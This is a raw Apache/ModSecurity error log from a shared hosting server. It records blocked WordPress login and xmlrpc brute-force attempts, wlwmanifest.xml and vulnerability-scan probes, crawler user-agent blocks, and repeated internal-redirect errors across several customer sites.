[Tue May 26 14:15:31.331937 2026] [security2:error] [pid 598542:tid 598747] [client 85.204.70.118:34344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/xmlrpc.php"] [unique_id "ahVdq_4iWyZxnXeAW3JJbgAAAEs"]
[Tue May 26 14:15:31.771991 2026] [security2:error] [pid 598542:tid 598772] [client 85.204.70.118:34348] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVdq_4iWyZxnXeAW3JJggAAAGQ"]
[Tue May 26 14:15:32.062397 2026] [security2:error] [pid 598542:tid 598740] [client 85.204.70.118:34360] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrP4iWyZxnXeAW3JJkQAAAEQ"]
[Tue May 26 14:15:32.276838 2026] [security2:error] [pid 598542:tid 598672] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdq_4iWyZxnXeAW3JJiwAAAAA"]
[Tue May 26 14:15:32.349363 2026] [security2:error] [pid 598542:tid 598692] [client 85.204.70.118:34376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrP4iWyZxnXeAW3JJlQAAABQ"]
[Tue May 26 14:15:32.642526 2026] [security2:error] [pid 598542:tid 598674] [client 85.204.70.118:34380] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrP4iWyZxnXeAW3JJmgAAAAI"]
[Tue May 26 14:15:32.947543 2026] [security2:error] [pid 598542:tid 598743] [client 85.204.70.118:34396] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrP4iWyZxnXeAW3JJpwAAAEc"]
[Tue May 26 14:15:33.266543 2026] [security2:error] [pid 598542:tid 598744] [client 85.204.70.118:34406] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrf4iWyZxnXeAW3JJrAAAAEg"]
[Tue May 26 14:15:33.557446 2026] [security2:error] [pid 598542:tid 598759] [client 85.204.70.118:34416] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrf4iWyZxnXeAW3JJtAAAAFc"]
[Tue May 26 14:15:33.872029 2026] [security2:error] [pid 598542:tid 598771] [client 85.204.70.118:34432] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrf4iWyZxnXeAW3JJuQAAAGM"]
[Tue May 26 14:15:34.168918 2026] [security2:error] [pid 598542:tid 598789] [client 85.204.70.118:34446] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrv4iWyZxnXeAW3JJxQAAAHU"]
[Tue May 26 14:15:34.470088 2026] [security2:error] [pid 598542:tid 598753] [client 85.204.70.118:34462] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrv4iWyZxnXeAW3JJzAAAAFE"]
[Tue May 26 14:15:34.767653 2026] [security2:error] [pid 598542:tid 598773] [client 85.204.70.118:34472] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVdrv4iWyZxnXeAW3JJ2wAAAGU"]
[Tue May 26 14:15:34.960591 2026] [security2:error] [pid 598542:tid 598767] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdrv4iWyZxnXeAW3JJ1gAAAF8"]
[Tue May 26 14:15:36.894267 2026] [security2:error] [pid 598542:tid 598777] [client 202.141.30.10:35474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdsP4iWyZxnXeAW3JKIAAAAGk"]
[Tue May 26 14:15:36.894494 2026] [security2:error] [pid 598542:tid 598777] [client 202.141.30.10:35474] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdsP4iWyZxnXeAW3JKIAAAAGk"]
[Tue May 26 14:15:37.137270 2026] [security2:error] [pid 598542:tid 598767] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdsP4iWyZxnXeAW3JKGwAAAF8"]
[Tue May 26 14:15:39.177845 2026] [security2:error] [pid 598542:tid 598705] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdsv4iWyZxnXeAW3JKWwAAACE"]
[Tue May 26 14:15:41.477701 2026] [security2:error] [pid 598542:tid 598798] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdtf4iWyZxnXeAW3JKngAAAH4"]
[Tue May 26 14:15:43.484454 2026] [security2:error] [pid 598542:tid 598727] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdt_4iWyZxnXeAW3JKyQAAADc"]
[Tue May 26 14:15:45.376539 2026] [security2:error] [pid 598542:tid 598766] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVduf4iWyZxnXeAW3JLAQAAAF4"], referer: https://www.anujtradingco.com/
[Tue May 26 14:15:45.645659 2026] [security2:error] [pid 598542:tid 598757] [client 85.8.130.8:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVdt_4iWyZxnXeAW3JKzgAAVWg"]
[Tue May 26 14:15:45.821263 2026] [security2:error] [pid 598542:tid 598768] [client 213.35.106.232:50929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVduf4iWyZxnXeAW3JLEAAAAGA"]
[Tue May 26 14:15:46.035665 2026] [security2:error] [pid 598542:tid 598771] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVduf4iWyZxnXeAW3JLDwAAAGM"]
[Tue May 26 14:15:46.210364 2026] [security2:error] [pid 598542:tid 598712] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVduv4iWyZxnXeAW3JLHwAAACg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 14:15:46.332854 2026] [security2:error] [pid 598542:tid 598716] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVduv4iWyZxnXeAW3JLJQAAACw"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 14:15:47.446534 2026] [security2:error] [pid 598542:tid 598732] [client 213.35.106.232:51196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVdu_4iWyZxnXeAW3JLRwAAADw"]
[Tue May 26 14:15:47.466963 2026] [security2:error] [pid 598542:tid 598722] [client 130.51.20.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdu_4iWyZxnXeAW3JLSgAAADI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:15:47.524154 2026] [security2:error] [pid 598542:tid 598763] [client 202.141.30.10:35531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdu_4iWyZxnXeAW3JLTgAAAFs"]
[Tue May 26 14:15:47.524718 2026] [security2:error] [pid 598542:tid 598763] [client 202.141.30.10:35531] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdu_4iWyZxnXeAW3JLTgAAAFs"]
[Tue May 26 14:15:48.155247 2026] [security2:error] [pid 598542:tid 598783] [client 130.51.20.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdvP4iWyZxnXeAW3JLXwAAAG8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1429949&moderation-hash=fcb1dce921150397d62e7b7a24e37920
[Tue May 26 14:15:48.208707 2026] [security2:error] [pid 598542:tid 598765] [client 213.35.106.232:51466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahVdvP4iWyZxnXeAW3JLZgAAAF0"]
[Tue May 26 14:15:48.491027 2026] [security2:error] [pid 598542:tid 598767] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdvP4iWyZxnXeAW3JLbQAAAF8"], referer: https://anujtradingco.com
[Tue May 26 14:15:48.509777 2026] [security2:error] [pid 598542:tid 598729] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdvP4iWyZxnXeAW3JLYAAAADk"]
[Tue May 26 14:15:48.955395 2026] [security2:error] [pid 598542:tid 598700] [client 213.35.106.232:51575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahVdvP4iWyZxnXeAW3JLdgAAABw"]
[Tue May 26 14:15:50.657476 2026] [security2:error] [pid 598542:tid 598765] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdvv4iWyZxnXeAW3JLngAAAF0"]
[Tue May 26 14:15:50.824820 2026] [security2:error] [pid 598542:tid 598708] [client 213.35.106.232:51716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-includes/version.php"] [unique_id "ahVdvv4iWyZxnXeAW3JLqQAAACQ"]
[Tue May 26 14:15:51.142722 2026] [core:error] [pid 598542:tid 598701] [client 45.148.10.204:41128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.142745 2026] [core:error] [pid 598542:tid 598701] [client 45.148.10.204:41128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.157886 2026] [core:error] [pid 598542:tid 598681] [client 45.148.10.204:41136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.157908 2026] [core:error] [pid 598542:tid 598681] [client 45.148.10.204:41136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.186052 2026] [core:error] [pid 598542:tid 598676] [client 45.148.10.204:41142] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.186074 2026] [core:error] [pid 598542:tid 598676] [client 45.148.10.204:41142] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.212856 2026] [core:error] [pid 598542:tid 598777] [client 45.148.10.204:41144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.212875 2026] [core:error] [pid 598542:tid 598777] [client 45.148.10.204:41144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.242284 2026] [core:error] [pid 598542:tid 598795] [client 45.148.10.204:41150] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.242302 2026] [core:error] [pid 598542:tid 598795] [client 45.148.10.204:41150] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.301810 2026] [core:error] [pid 598542:tid 598745] [client 45.148.10.204:41164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.301830 2026] [core:error] [pid 598542:tid 598745] [client 45.148.10.204:41164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.322746 2026] [core:error] [pid 598542:tid 598749] [client 45.148.10.204:41182] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.322763 2026] [core:error] [pid 598542:tid 598749] [client 45.148.10.204:41182] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.322814 2026] [core:error] [pid 598542:tid 598700] [client 45.148.10.204:41172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.322832 2026] [core:error] [pid 598542:tid 598700] [client 45.148.10.204:41172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.327195 2026] [core:error] [pid 598542:tid 598679] [client 45.148.10.204:41194] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.327209 2026] [core:error] [pid 598542:tid 598679] [client 45.148.10.204:41194] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.396154 2026] [security2:error] [pid 598542:tid 598775] [client 172.225.238.101:20678] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVdvv4iWyZxnXeAW3JLogAAZ2s"]
[Tue May 26 14:15:51.494794 2026] [core:error] [pid 598542:tid 598794] [client 45.148.10.204:41202] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.494812 2026] [core:error] [pid 598542:tid 598794] [client 45.148.10.204:41202] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.747855 2026] [core:error] [pid 598542:tid 598703] [client 45.148.10.204:41204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.747878 2026] [core:error] [pid 598542:tid 598703] [client 45.148.10.204:41204] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.758961 2026] [core:error] [pid 598542:tid 598779] [client 45.148.10.204:41218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.758986 2026] [core:error] [pid 598542:tid 598779] [client 45.148.10.204:41218] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.761920 2026] [core:error] [pid 598542:tid 598770] [client 45.148.10.204:41232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.761935 2026] [core:error] [pid 598542:tid 598770] [client 45.148.10.204:41232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:51.856691 2026] [security2:error] [pid 598542:tid 598731] [client 213.35.106.232:52088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-includes/functions.php"] [unique_id "ahVdv_4iWyZxnXeAW3JLzgAAADs"]
[Tue May 26 14:15:52.215255 2026] [core:error] [pid 598542:tid 598778] [client 45.148.10.204:41236] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:52.215284 2026] [core:error] [pid 598542:tid 598778] [client 45.148.10.204:41236] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:15:52.582100 2026] [security2:error] [pid 598542:tid 598692] [client 62.60.130.233:61045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahVdwP4iWyZxnXeAW3JL5wAAABQ"], referer: https://twitter.com/
[Tue May 26 14:15:52.656053 2026] [security2:error] [pid 598542:tid 598688] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdwP4iWyZxnXeAW3JL3QAAABA"]
[Tue May 26 14:15:52.918013 2026] [security2:error] [pid 598542:tid 598777] [client 62.60.130.233:62933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/wp-login.php"] [unique_id "ahVdwP4iWyZxnXeAW3JL8gAAAGk"]
[Tue May 26 14:15:54.059816 2026] [security2:error] [pid 598542:tid 598781] [client 213.35.106.232:52296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahVdwv4iWyZxnXeAW3JMHQAAAG0"]
[Tue May 26 14:15:54.590749 2026] [security2:error] [pid 598542:tid 598786] [client 173.252.82.20:47918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVdwf4iWyZxnXeAW3JL9QAAcg4"]
[Tue May 26 14:15:54.713729 2026] [security2:error] [pid 598542:tid 598724] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdwv4iWyZxnXeAW3JMIwAAADQ"]
[Tue May 26 14:15:54.948781 2026] [security2:error] [pid 598542:tid 598757] [client 213.35.106.232:52752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/wp-includes/option.php"] [unique_id "ahVdwv4iWyZxnXeAW3JMPgAAAFU"]
[Tue May 26 14:15:55.611247 2026] [security2:error] [pid 598542:tid 598760] [client 85.208.96.210:37198] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/day/2022-02-01/"] [unique_id "ahVdw_4iWyZxnXeAW3JMVQAAAFg"]
